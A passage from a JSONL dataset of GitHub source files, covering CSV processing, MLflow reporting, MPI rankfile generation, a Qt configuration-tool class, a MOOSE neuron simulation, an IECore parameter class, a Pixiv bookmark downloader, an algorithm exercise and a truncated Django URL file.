open(os.path.join(\"C:/Users/thiag/Desktop/bacen/Scripts/CSVS - BANCO DE DADOS\",nfile),\"w\",newline=\"\")\n self.cabecalho = [\"Data\", \"Codigo\" , \"Tipo\", \"Moeda\", \"Cotacao em Real: Compra\",\"Cotacao em Real: Venda\",\"Paridades:Compra\",\"Paridades:Compra\"]\n def novoarquivo(self):\n writer = csv.writer(self.file_o,delimiter=\",\")\n #writer.writerow(self.cabecalho)\n for linha in self.linhas:\n writer.writerow(linha)\n self.file_o.close()\n Arquivo_entrada.closeFile(self)\n\n #print(\"Novo Arquivo Gerado\")\n\n\n\ndef main():\n for n in itens:\n fileDownload = Arquivo_entrada(n)\n fileDatabase = Arquivo_saida(n)\n fileDatabase.novoarquivo()\n fileDownload.closeFile()\n print(\"Arquivos Gerados\")\n source = \"C:/Users/thiag/Desktop/bacen/Arquivosbacen\"\n destination = \"C:/Users/thiag/Desktop/bacen/importados\"\n for files in itens:\n shutil.move(os.path.join(source,files) , destination)\n return(\"Arquivos Movidos para - \" + destination )\n\n\n","repo_name":"tgomes1992/extracaobacen","sub_path":"leituracsv.py","file_name":"leituracsv.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30061931550","text":"import json\nfrom functools import reduce\nfrom glob import glob\nfrom os import path\n\n# from textwrap import wrap\nimport click\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom mlflow.tracking import MlflowClient\nfrom scipy import stats\n\nfrom src import config\nfrom src.utils.misc import product_dict\n\nmodels = [\n {\n \"name\": \"bagging-rgcn-with-embeddings\",\n \"params\": {\"embeddings_merged_layers\": [True, False]},\n },\n {\n \"name\": \"bagging-mlp\",\n \"params\": {\"merged_layers\": [True, False], \"node_features\": [True, False]},\n },\n {\n \"name\": \"bagging-logistic-regression\",\n \"params\": {\"merged_layers\": [True, False], \"node_features\": [True, False]},\n },\n {\n \"name\": \"bagging-rgcn\",\n \"params\": {\"merged_layers\": [True, False], \"node_features\": [True, False]},\n },\n {\"name\": \"rwr-m\", \"params\": {\"merged_layers\": [True, False],}},\n {\n \"name\": \"bagging-gcn\",\n \"params\": {\"merged_layers\": [True], \"node_features\": [True, False]},\n },\n {\"name\": \"rwr\", \"params\": {\"merged_layers\": [True],}},\n {\"name\": \"label-spreading\", \"params\": {\"merged_layers\": [True],}},\n {\"name\": \"direct-neighbors\", \"params\": {\"merged_layers\": [True],}},\n]\n\n\ndef get_best_runs_by_model(experience_name):\n client = MlflowClient()\n experiments = client.list_experiments()\n experiment = next(ex for ex in experiments if ex.name == experience_name)\n experiment_id = experiment.experiment_id\n\n best_runs_by_model = []\n for model in models:\n for params in product_dict(**model[\"params\"]):\n filter_string = f'params.model=\"{model[\"name\"]}\"'\n\n for param_key, param_value in params.items():\n filter_string += f' and params.{param_key}=\"{param_value}\"'\n\n runs = client.search_runs(\n experiment_id,\n filter_string,\n order_by=[\"metric.auc DESC\"],\n max_results=1,\n )\n\n if not runs:\n continue\n\n run = runs[0]\n\n run_name = run.data.tags[\"mlflow.runName\"]\n for idx, (param_key, param_value) in enumerate(params.items()):\n if idx == 0:\n run_name += f\" | \"\n else:\n run_name += f\", \"\n run_name += f\"{param_key}={param_value}\"\n\n best_runs_by_model.append({\"name\": run_name, \"run\": runs[0]})\n\n return best_runs_by_model\n\n\ndef dict_to_html(dictionary):\n return \"
\".join([f\"{key}={value}\" for key, value in dictionary.items()])\n\n\ndef save_runs(runs, experience_name):\n data = {\n \"Run ID\": [],\n \"Run Name\": [],\n \"Model\": [],\n \"Parameters\": [],\n \"Metrics\": [],\n \"AUC\": [],\n \"AUC Ratio\": [],\n }\n\n for item in runs:\n run = item[\"run\"]\n run_name = item[\"name\"]\n\n data[\"Run ID\"].append(run.info.run_id)\n data[\"Run Name\"].append(run_name)\n data[\"Model\"].append(run.data.params[\"model\"])\n data[\"Parameters\"].append(run.data.params)\n data[\"Metrics\"].append(run.data.metrics)\n data[\"AUC\"].append(run.data.metrics[\"auc\"])\n data[\"AUC Ratio\"].append(run.data.metrics[\"auc_ratio\"])\n\n runs_df = pd.DataFrame(\n data,\n columns=[\n \"Run ID\",\n \"Run Name\",\n \"Model\",\n \"Parameters\",\n \"Metrics\",\n \"AUC\",\n \"AUC Ratio\",\n ],\n dtype=object,\n )\n runs_df.sort_values(by=\"AUC\", ascending=False, inplace=True)\n\n runs_df_tsv = runs_df.copy()\n runs_df_tsv[\"Parameters\"] = runs_df_tsv[\"Parameters\"].apply(json.dumps)\n runs_df_tsv[\"Metrics\"] = runs_df_tsv[\"Metrics\"].apply(json.dumps)\n out_tsv_file = path.join(\n config.REPORTS_DIR, f\"{experience_name.lower()}_best-runs-by-model.tsv\"\n )\n print(f\"Saving {out_tsv_file}...\")\n runs_df_tsv.to_csv(out_tsv_file, sep=\"\\t\")\n\n runs_df_html = runs_df.copy()\n runs_df_html[\"Parameters\"] = runs_df_html[\"Parameters\"].apply(dict_to_html)\n runs_df_html[\"Metrics\"] = runs_df_html[\"Metrics\"].apply(dict_to_html)\n out_html_file = path.join(\n config.REPORTS_DIR, f\"{experience_name.lower()}_best-runs-by-model.html\"\n )\n print(f\"Saving {out_html_file}...\")\n pd.set_option(\"display.max_colwidth\", -1)\n runs_df_html.to_html(out_html_file, justify=\"justify\", escape=False)\n\n\ndef corrfunc(x, y, ax=None, **kws):\n \"\"\"Plot the correlation coefficient in the top left hand corner of a plot.\"\"\"\n rho, pval = stats.spearmanr(x, y)\n ax = ax or plt.gca()\n ax.annotate(\n f\"$\\\\rho$ = {rho:.2f}, pval={pval:.2f}\", xy=(0.1, 0.9), xycoords=ax.transAxes\n )\n\n\ndef generate_pair_grid(runs, experience_name):\n ranks_dfs = []\n for item in runs:\n run = item[\"run\"]\n run_name = item[\"name\"]\n\n # Get ranks artifact\n abs_artifact_uri = run.info.artifact_uri.replace(\"file://\", \"\")\n results_artifact_uri = path.join(abs_artifact_uri, \"results\")\n ranks_file, *_ = glob(path.join(results_artifact_uri, \"ranks*.tsv\"))\n\n # Load file with ranks\n df = pd.read_csv(ranks_file, sep=\"\\t\")\n run_name = run_name.replace(\" | \", \"\\n\")\n run_name = run_name.replace(\", \", \"\\n\")\n # run_name = \"\\n\".join(wrap(run_name, 25))\n df.rename(columns={\"rank\": run_name}, inplace=True)\n\n ranks_dfs.append(df)\n\n ranks_df = reduce(\n lambda left, right: pd.merge(left, right, on=\"pos_node_index\"), ranks_dfs\n )\n ranks_df = ranks_df.set_index(\"pos_node_index\")\n\n plt.style.use(\"seaborn\")\n plot = sns.pairplot(ranks_df, kind=\"reg\", height=5)\n\n max_rank = ranks_df.max().max()\n plot.set(ylim=(0, max_rank + 1))\n plot.set(xlim=(0, max_rank + 1))\n plot.map_offdiag(corrfunc)\n\n # Save pair plot\n out_png_file = path.join(\n config.REPORTS_DIR, f\"{experience_name.lower()}_best-runs-by-model_pairplot.png\"\n )\n print(f\"Saving {out_png_file}...\")\n plot.savefig(out_png_file)\n\n\ndef main(experience_name):\n runs = get_best_runs_by_model(experience_name)\n save_runs(runs, experience_name)\n generate_pair_grid(runs, experience_name)\n\n\n@click.group()\ndef cli():\n pass\n\n\n@click.command()\ndef validation():\n main(\"LOOCV\")\n\n\n@click.command()\ndef test():\n main(\"Test\")\n\n\ncli.add_command(validation)\ncli.add_command(test)\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"RausellLab/Tiresias","sub_path":"src/reports/best_runs_by_model.py","file_name":"best_runs_by_model.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"1118615624","text":"machines = [x.strip() for x in open(\"machinefile\", \"r\").readlines()]\n\ncores_per_machine = 10\ntotal_cores = 8\n\nwhile total_cores <= 32:\n entry_list = []\n\n for i in range(total_cores):\n machine = i // cores_per_machine\n core = i % cores_per_machine\n entry = machines[machine] + \" slot=0:\" + str(core)\n entry_list.append(entry)\n\n example = \"rank 0=soctf-pdf-003 slot=0:0\"\n\n with open(str(total_cores) + \"rankfile\", \"w\") as f:\n for i in range(65):\n entry = entry_list[i % len(entry_list)]\n f.write(\"rank %d=\" % (i) + entry + \"\\n\")\n\n total_cores *= 2\n","repo_name":"indocomsoft/cs3210-assignment1-mpi","sub_path":"gen_rankfile.py","file_name":"gen_rankfile.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70038930001","text":"from .ServerCommands import (\n ServerConnect,\n ServerCPCreate,\n ServerSCPCreate,\n ServerDSCreate,\n ServerFetchComponents,\n ServerStoreComponent,\n ServerStoreAllComponents,\n ServerDeleteComponent,\n ServerSetMandatoryComponent,\n ServerGetMandatoryComponents,\n ServerUnsetMandatoryComponent,\n ServerFetchDataSources,\n ServerStoreDataSource,\n ServerStoreAllDataSources,\n ServerDeleteDataSource,\n ServerClose)\n\nfrom .EditCommands import (\n ComponentEdit,\n DataSourceApply,\n DataSourceEdit\n)\n\nfrom .ItemCommands import (\n ComponentApplyItem,\n ComponentMerge,\n)\n\n\n# stack with the application commands\nclass ServerSlots(object):\n\n # constructor\n # \\param main the main window dialog\n def __init__(self, main):\n # main window\n self.main = main\n # command stack\n self.undoStack = main.undoStack\n\n # action data\n self.actions = {\n \"actionConnectServer\": [\n \"&Connect ...\", \"serverConnect\",\n \"Ctrl+T\", \"serverconnect\",\n \"Connect to the configuration server\"],\n \"actionFetchComponentsServer\": [\n \"&Fetch Components\", \"serverFetchComponents\",\n \"Ctrl+F\", \"serverfetchdatasources\",\n \"Fetch datasources from the configuration server\"],\n\n \"actionStoreComponentServer\": [\n \"&Store Component\", \"serverStoreComponent\",\n \"Ctrl+B\", \"serverstorecomponent\",\n \"Store component in the configuration server\"],\n\n \"actionStoreAllComponentsServer\": [\n \"&Store All Components\", \"serverStoreAllComponents\",\n \"\", \"serverstoreallcomponents\",\n \"Store all components in the configuration server\"],\n\n \"actionDeleteComponentServer\": [\n \"&Delete Component\", \"serverDeleteComponent\",\n \"Ctrl+H\", \"serverdeletecomponent\",\n \"Delete component from the configuration server\"],\n\n \"actionFetchDataSourcesServer\": [\n \"&Fetch DataSources\", \"serverFetchDataSources\",\n \"Ctrl+Shift+F\", \"serverfetchdatasources\",\n \"Fetch datasources from the configuration server\"],\n\n \"actionStoreDataSourceServer\": [\n \"&Store Datasource\", \"serverStoreDataSource\",\n \"Ctrl+Shift+B\", \"serverstoredatasource\",\n \"Store datasource in the configuration server\"],\n\n \"actionStoreAllDataSourcesServer\": [\n \"&Store All Datasources\", \"serverStoreAllDataSources\",\n \"\", \"serverstorealldatasources\",\n \"Store all datasources in the configuration server\"],\n\n \"actionDeleteDataSourceServer\": [\n \"&Delete Datasource\", \"serverDeleteDataSource\",\n \"Ctrl+Shift+H\", \"serverdeletedatasource\",\n \"Delete datasource from the configuration server\"],\n\n \"actionSetComponentMandatoryServer\": [\n \"Set Component Mandatory\", \"serverSetMandatoryComponent\",\n \"\", \"serversetmandatory\",\n \"Set the component as mandatory on the configuration server\"],\n\n \"actionGetMandatoryComponentsServer\": [\n \"Get Mandatory Components\", \"serverGetMandatoryComponents\",\n \"\", \"servergetmandatory\",\n \"Get mandatory components from the configuration server\"],\n\n \"actionUnsetComponentMandatoryServer\": [\n \"Unset Component Mandatory\", \"serverUnsetMandatoryComponent\",\n \"\", \"serverunsetmandatory\",\n \"Unset the component as mandatory on\"\n \" the configuration server\"],\n \"actionCreateStdComponentServer\": [\n \"&Create Standard Component ...\", \"serverSCPCreate\",\n \"\", \"serverscpcreate\",\n \"Create Component defined in online.xml file\"],\n \"actionCreateComponentServer\": [\n \"&Create Online Component ...\", \"serverCPCreate\",\n \"\", \"servercpcreate\",\n \"Create Component defined in online.xml file\"],\n \"actionCreateDataSourcesServer\": [\n \"&Create Online Component ...\", \"serverDSCreate\",\n \"\", \"serverdscreate\",\n \"Create all known DataSources defined in online.xml file\"],\n \"actionCloseServer\": [\n \"C&lose\", \"serverClose\",\n \"Ctrl+L\", \"serverclose\",\n \"Close connection to the configuration server\"]\n }\n\n # connect server action\n # \\brief It connects to configuration server\n def serverConnect(self):\n cmd = ServerConnect(self.main)\n self.undoStack.push(cmd)\n\n # create component action\n # \\brief It creates components and datasources from online.xml\n def serverCPCreate(self):\n cmd = ServerCPCreate(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # create standard component action\n # \\brief It creates stamdard components and datasources from online.xml\n def serverSCPCreate(self):\n cmd = ServerSCPCreate(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # create datasources action\n # \\brief It creates all known datasources from online.xml\n def serverDSCreate(self):\n cmd = ServerDSCreate(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # fetch server components action\n # \\brief It fetches components from the configuration server\n def serverFetchComponents(self):\n cmd = ServerFetchComponents(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # store server component action executed by button\n # \\brief It stores the current component\n # in the configuration server executed by button\n def serverStoreComponentButton(self):\n if self.main.updateComponentListItem():\n cmd = ComponentApplyItem(self.main)\n self.undoStack.push(cmd)\n self.serverStoreComponent(False)\n\n # store server component action\n # \\brief It stores the current component in the configuration server\n def serverStoreComponent(self, focus=True):\n cmd = ComponentEdit(self.main)\n cmd.redo()\n cmd = ComponentMerge(self.main)\n self.undoStack.push(cmd)\n cmd = ServerStoreComponent(self.main)\n cmd.redo()\n if focus:\n self.main.componentList.setItemFocus()\n\n # store server all components action\n # \\brief It stores all components in the configuration server\n def serverStoreAllComponents(self):\n cmd = ComponentApplyItem(self.main)\n cmd = ServerStoreAllComponents(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # delete server component action\n # \\brief It deletes the current component from the configuration server\n def serverDeleteComponent(self):\n cmd = ServerDeleteComponent(self.main)\n cmd.redo()\n self.main.componentList.setItemFocus()\n\n # set component mandatory action\n # \\brief It sets the current component as mandatory\n def serverSetMandatoryComponent(self):\n cmd = ServerSetMandatoryComponent(self.main)\n cmd.redo()\n\n # get mandatory components action\n # \\brief It fetches mandatory components\n def serverGetMandatoryComponents(self):\n cmd = ServerGetMandatoryComponents(self.main)\n cmd.redo()\n\n # unset component mandatory action\n # \\brief It unsets the current component as mandatory\n def serverUnsetMandatoryComponent(self):\n cmd = ServerUnsetMandatoryComponent(self.main)\n cmd.redo()\n\n # fetch server datasources action\n # \\brief It fetches datasources from the configuration server\n def serverFetchDataSources(self):\n cmd = ServerFetchDataSources(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # store server datasource action\n # \\brief It stores the current datasource in the configuration server\n def serverStoreDataSource(self, focus=True):\n cmd = DataSourceEdit(self.main)\n cmd.redo()\n cmd = DataSourceApply(self.main)\n self.undoStack.push(cmd)\n cmd = ServerStoreDataSource(self.main)\n cmd.redo()\n if focus:\n self.main.sourceList.setItemFocus()\n\n # store server datasource action executed by button\n # \\brief It stores the current datasource in\n # the configuration server executed by button\n def serverStoreDataSourceButton(self):\n if self.main.updateDataSourceListItem():\n self.serverStoreDataSource(False)\n\n # store server all datasources action\n # \\brief It stores all components in the configuration server\n def serverStoreAllDataSources(self):\n cmd = ServerStoreAllDataSources(self.main)\n cmd.redo()\n self.undoStack.clear()\n\n # delete server datasource action\n # \\brief It deletes the current datasource from the configuration server\n def serverDeleteDataSource(self):\n cmd = DataSourceEdit(self.main)\n cmd.redo()\n cmd = ServerDeleteDataSource(self.main)\n cmd.redo()\n self.main.sourceList.setItemFocus()\n\n # close server action\n # \\brief It closes the configuration server\n def serverClose(self):\n cmd = ServerClose(self.main)\n self.undoStack.push(cmd)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"nexdatas/nxsdesigner","sub_path":"nxsconfigtool/ServerSlots.py","file_name":"ServerSlots.py","file_ext":"py","file_size_in_byte":9419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3510676531","text":"# dump_f_i_curves.py --- \n# \n# Filename: dump_f_i_curves.py\n# Description: \n# Author: Subhasis Ray\n# Maintainer: \n# Created: Tue Dec 8 13:11:01 2015 (-0500)\n# Version: \n# Package-Requires: ()\n# Last-Updated: Wed Dec 9 12:28:06 2015 (-0500)\n# By: Subhasis Ray\n# Update #: 79\n# URL: \n# Doc URL: \n# Keywords: \n# Compatibility: \n# \n# \n\n# Commentary: \n# \n# \n# \n# \n\n# Change Log:\n# \n# \n# \n# \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or (at\n# your option) any later version.\n# \n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with GNU Emacs. If not, see .\n# \n# \n\n# Code:\n\n\"\"\"Do a series of current steps on each celltype\"\"\"\n\nimport numpy as np\ntry:\n import h5py as h5\nexcept ImportError as e:\n print( \"[INFO ] h5py is not found. Quitting ...\" )\n quit()\n \nfrom collections import defaultdict\n\nimport moose\nfrom moose import utils as mutils\n\nfrom cells import SpinyStellate\nfrom cells import DeepBasket\nfrom cells import DeepLTS\n\n\nsimdt = 2.5e-6\nplotdt = 1e-4\n\namps = np.array([-0.1, 0.1, 0.5, 1.0, 1.5])*1e-9\n\ndef run_current_pulse(amps, delay=100e-3, dur=100e-3, trail=100e-3, outfile='f_i_curves_data.h5'):\n models = []\n model = moose.Neutral('/model')\n data = moose.Neutral('/data')\n ddict = defaultdict(list)\n for ii, amp in enumerate(amps):\n mc = moose.Neutral('{}/mc_{}'.format(model.path, ii))\n models.append(mc)\n stim = moose.PulseGen('{}/stim_{}'.format(mc.path, ii))\n stim.delay[0] = delay\n stim.width[0] = dur\n stim.level[0] = amp\n stim.delay[1] = 1e9 # make delay so large that it does not activate again\n for celltype in [SpinyStellate, DeepBasket, DeepLTS]:\n cell = celltype('{}/{}_{}'.format(mc.path, celltype.__name__, ii))\n solver = moose.element('{}/solver'.format(cell.path))\n solver.dt = simdt\n solver.target = cell.path\n stim.connect('output', cell.soma, 'injectMsg')\n tab = moose.Table('/data/Vm_{}'.format(cell.name))\n ddict[ii].append(tab)\n tab.connect('requestOut', cell.soma, 'getVm')\n mutils.setDefaultDt(elecdt=simdt, plotdt2=plotdt)\n mutils.assignDefaultTicks(modelRoot='/model', dataRoot='/data', solver='hsolve')\n moose.reinit()\n print('Finished scheduling')\n moose.start(delay + dur + trail)\n print('Finished simulation')\n # Save data\n fd = h5.File(outfile, 'w') \n for ii, tabs in list(ddict.items()):\n for tab in tabs:\n print(('Table', tab.name))\n node = fd.create_dataset(tab.name, data=tab.vector)\n node.attrs['current'] = amps[ii]\n node.attrs['delay'] = delay\n node.attrs['width'] = dur\n fd.close()\n print(('Finished saving data in file', outfile))\n\n\nif __name__ == '__main__':\n run_current_pulse(amps)\n\n# \n# dump_f_i_curves.py ends here\n","repo_name":"BhallaLab/moose","sub_path":"moose-examples/traub_2005/py/dump_f_i_curves.py","file_name":"dump_f_i_curves.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"} +{"seq_id":"72110542800","text":"import IECore\n\n## The ClassParameter is a specialised CompoundParameter which allows its\n# children to be specified by another Parameterised class which is loaded\n# using the ClassLoader. This allows one class to easily nest another while\n# exposing the other's parameters publicly.\nclass ClassParameter( IECore.CompoundParameter ) :\n\n\tdef __init__( self, name, description, searchPathEnvVar, className=\"\", classVersion=0, userData=None ) :\n\n\t\tIECore.CompoundParameter.__init__( self, name, description, userData=userData )\n\n\t\tself.__classInstance = None\n\t\tself.__className = \"\"\n\t\tself.__classVersion = 0\n\t\tself.__searchPathEnvVar = searchPathEnvVar\n\n\t\tself.setClass( className, classVersion, searchPathEnvVar )\n\n\t## Return the class being held. If withClassLoaderArgs is True then a tuple is returned\n\t# in the following form : ( class, className, classVersion, searchPathEnvVar ).\n\tdef getClass( self, withClassLoaderArgs=False ) :\n\n\t\tif withClassLoaderArgs :\n\t\t\treturn ( self.__classInstance, self.__className, self.__classVersion, self.__searchPathEnvVar )\n\t\telse :\n\t\t\treturn self.__classInstance\n\n\t## Sets the class being held. The specified class is loaded using a ClassLoader and\n\t# the class' parameters are added to this parameter as children.\n\tdef setClass( self, className, classVersion, searchPathEnvVar=None ) :\n\n\t\tsearchPathToUse = searchPathEnvVar if searchPathEnvVar is not None else self.__searchPathEnvVar\n\n\t\tif ( className, classVersion, searchPathToUse ) == ( self.__className, self.__classVersion, self.__searchPathEnvVar ) :\n\t\t\treturn\n\n\t\tself.__classInstance = None\n\t\tself.clearParameters()\n\n\t\tif className!=\"\" :\n\n\t\t\tloader = IECore.ClassLoader.defaultLoader( searchPathToUse )\n\n\t\t\tself.__classInstance = loader.load( className, classVersion )()\n\n\t\t\tself.addParameters(\n\t\t\t\tself.__classInstance.parameters().values()\n\t\t\t)\n\n\t\tself.__className = className\n\t\tself.__classVersion = classVersion\n\t\tself.__searchPathEnvVar = searchPathToUse\n\n\t@staticmethod\n\tdef _serialise( parameter, value ) :\n\n\t\treturn [\n\n\t\t\tparameter.__className,\n\t\t\tstr( parameter.__classVersion ),\n\t\t\tparameter.__searchPathEnvVar,\n\n\t\t]\n\n\t@staticmethod\n\tdef _parse( args, parameter ) :\n\n\t\tparameter.setClass( args[0], int( args[1] ), args[2] )\n\t\tdel args[0:3]\n\nIECore.registerRunTimeTyped( ClassParameter, IECore.TypeId.ClassParameter )\n\nIECore.ParameterParser.registerType( ClassParameter.staticTypeId(), ClassParameter._parse, ClassParameter._serialise )\n","repo_name":"ImageEngine/cortex","sub_path":"python/IECore/ClassParameter.py","file_name":"ClassParameter.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":510,"dataset":"github-code","pt":"3"} +{"seq_id":"7032739332","text":"from Pixiv_Miku_DownloaderAPI.Download_CenterAPI import *\nfrom pixivpy3 import *\nimport os\nimport time\nimport pandas as pd\nimport shutil\nimport copy\n\nsni = False\nif not sni:\n api = AppPixivAPI()\nelse:\n api = ByPassSniApi() # Same as AppPixivAPI, but bypass the GFW\n api.require_appapi_hosts()\n\nMDapi=Pixiv_Miku_Download_API()\nMDapi.login_user()\n\nIDrecord_dic={}\n\n\n\n\n\ndef download_bookmark_and_search(json_results=None,\n IDrecord_lists=[],\n member_id=5545356,\n aim='favorite',\n count=0,\n NF_break_value=-1,\n Illusts_path=os.getcwd()):\n\n if json_results:\n json_results=MDapi.get_next_queue(json_results=json_results,json_result_key=aim)\n else:\n json_results=MDapi.get_json(aim=aim,member_id=member_id)\n Illusts_path=MDapi.create_illusts_dir(aim=aim)\n\n for idx, illust in enumerate(json_results.illusts):\n if aim=='not_favorite' and illust.total_bookmarks>=100 or illust.id in IDrecord_dic['favorite']:\n continue\n image_url = []\n print(idx)\n print(illust)\n count+=1\n print(count)\n print(NF_break_value)\n\n if illust.page_count == 1:\n image_url.append(illust.meta_single_page.get('original_image_url', illust.image_urls.large))\n elif illust.page_count > 1:\n for i in illust.meta_pages:\n image_url.append(i.image_urls.original)\n else:\n continue\n\n for a in image_url:\n api.download(a, path=Illusts_path, name=None)\n print(a)\n IDrecord_lists.append(illust.id)\n\n if count == NF_break_value:\n print('stop!!!!!!!!')\n return IDrecord_lists\n\n if json_results.next_url:\n time.sleep(1)\n download_bookmark_and_search(json_results=json_results,\n IDrecord_lists=IDrecord_lists,\n aim=aim,\n count=count,\n NF_break_value=NF_break_value,\n Illusts_path=Illusts_path)\n\n return IDrecord_lists\n \n\n\n\ndef update_bookmark_and_search(json_results=None,\n IDrecord_lists=[],\n member_id=5545356,\n aim='favorite',\n count=0,\n NF_break_value=-1,\n Illusts_path=os.getcwd()):\n\n\n if json_results:\n json_results=MDapi.get_next_queue(json_results=json_results,json_result_key=aim)\n else:\n json_results=MDapi.get_json(aim=aim,member_id=member_id)\n Illusts_path=MDapi.create_illusts_dir(aim=aim)\n\n for idx, illust in enumerate(json_results.illusts):\n if aim=='not_favorite' and illust.total_bookmarks>=100 or illust.id in IDrecord_dic['favorite']:\n continue\n print(idx)\n print(illust)\n print(count)\n print(NF_break_value)\n if aim=='favorite' and illust.id in IDrecord_dic['favorite']:\n print('illust.id in old_F_lists')\n return IDrecord_lists\n image_url = []\n\n count+=1\n\n if illust.page_count == 1:\n image_url.append(illust.meta_single_page.get('original_image_url', illust.image_urls.large))\n elif illust.page_count > 1:\n for i in illust.meta_pages:\n image_url.append(i.image_urls.original)\n else:\n continue\n\n remove_file=False\n if aim == 'favorite' and illust.id in IDrecord_dic['not_favorite']:\n remove_file=True\n\n for a in image_url:\n print(a)\n api.download(a, path=Illusts_path, name=None)\n\n if remove_file:\n print('remove old illust')\n old_NF_file_path = os.path.join(MDapi.create_illusts_dir(aim='not_favorite'), os.path.basename(a))\n print(old_NF_file_path)\n os.remove(old_NF_file_path)\n if remove_file:\n IDrecord_dic['not_favorite'].remove(illust.id)\n\n\n\n IDrecord_lists.append(illust.id)\n\n if count == NF_break_value:\n print('stop!!!!!!!!')\n return IDrecord_lists\n\n if json_results.next_url:\n time.sleep(1)\n update_bookmark_and_search(json_results=json_results,\n IDrecord_lists=IDrecord_lists,\n aim=aim,\n count=count,\n NF_break_value=NF_break_value,\n Illusts_path=Illusts_path)\n\n return IDrecord_lists\n\n\n\n\n\n\"\"\"\nfavorite_IDrecord_lists=download_bookmark_and_search(aim='favorite',member_id=58130520)\nprint(favorite_IDrecord_lists)\nIDrecord_dic={'favorite':favorite_IDrecord_lists}\n\nNF_break_value=len(favorite_IDrecord_lists)\nprint('NF_break_value:'+str(NF_break_value))\n\n\nnot_favorite_IDrecord_lists=download_bookmark_and_search(IDrecord_lists=[],aim='not_favorite',NF_break_value=NF_break_value)\nprint(not_favorite_IDrecord_lists)\nIDrecord_dic['not_favorite']=not_favorite_IDrecord_lists\n\nprint(IDrecord_dic)\ndf=pd.DataFrame.from_dict(IDrecord_dic)\nprint(df)\ndf.to_csv(\"Miku_Illusts_record.csv\", index=False)\n\"\"\"\n\nold_DF_records = pd.read_csv('Miku_Illusts_record.csv')\nprint(old_DF_records)\nIDrecord_dic={'favorite':old_DF_records['favorite'].tolist(),\n 'not_favorite':old_DF_records['not_favorite'].tolist()\n }\nprint(IDrecord_dic)\n\n\n\n\nnew_favorite_lists=update_bookmark_and_search(aim='favorite',member_id=58130520)\ncurrent_favorite_lists=new_favorite_lists+IDrecord_dic['favorite']\n\nprint(len(current_favorite_lists))\nprint(len(IDrecord_dic['not_favorite']))\nIDrecord_dic['favorite']=current_favorite_lists\nprint(IDrecord_dic)\nNF_break_value=len(current_favorite_lists)-len(IDrecord_dic['not_favorite'])\n\nnew_not_favorite_lists=update_bookmark_and_search(IDrecord_lists=[],aim='not_favorite',NF_break_value=NF_break_value)\ncurrent_not_favorite_lists=new_not_favorite_lists+IDrecord_dic['not_favorite']\nIDrecord_dic['not_favorite']=current_not_favorite_lists\ndf=pd.DataFrame.from_dict(IDrecord_dic)\nprint(df)","repo_name":"Wayne40406130/Miku_Favorite_and_NotFavorite_SRDAPI","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":6383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32963838995","text":"# В первой строке задано два целых числа 1≤n≤50000 и 1≤m≤50000 — количество отрезков и точек на прямой, соответственно.\n# Следующие n строк содержат по два целых числа ai и bi (ai≤bi) — координаты концов отрезков.\n# Последняя строка содержит m целых чисел — координаты точек.\n# Все координаты не превышают 10^8 по модулю.\n# Точка считается принадлежащей отрезку, если она находится внутри него или на границе.\n# Для каждой точки в порядке появления во вводе выведите, скольким отрезкам она принадлежит.\n\n\nimport bisect\n\n\ndef inp():\n counts = input()\n count_segments, count_point = map(int, counts.split())\n segments_list = []\n for i in range(count_segments):\n segments_list.append(list(map(int, input().split())))\n points = input()\n points_list = list(map(int, points.split()))\n return segments_list, points_list\n\n\ndef main():\n segments_list, points_list = inp()\n sorted_right_segments_list = sorted([segment[0] for segment in segments_list])\n sorted_left_segments_list = sorted([segment[1] for segment in segments_list])\n result = []\n for point in points_list:\n index_right = bisect.bisect_right(sorted_right_segments_list, point)\n index_left = bisect.bisect_left(sorted_left_segments_list, point)\n result.append(index_right - index_left)\n print(' '.join(map(str, result)))\n\n\nmain()\n","repo_name":"Timmi239/algorithms","sub_path":"stepic/6_d&c/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20107742502","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\nfrom clinic import views\n\napp_name = \"clinic\"\nurlpatterns = [\n path(\"\",views.index,name=\"home\"),\n path(\"about/\",views.about,name=\"about\"),\n path(\"service/\",views.service,name=\"service\"),\n path(\"contact/\",views.contact,name=\"contact\"),\n path(\"pricing_plan/\",views.pricing_plan,name=\"pricing_plan\"),\n path(\"doctors/\",views.dentist,name=\"doctors\"),\n path(\"testimonial/\",views.testimonial,name=\"testimonial\"),\n path(\"appointment/\",views.appointment,name=\"appointment\"),\n path(\"appointment-page/\",views.appointment_page,name=\"appointment_page\"),\n path(\"doctors-search/\",views.search,name=\"search\"),\n 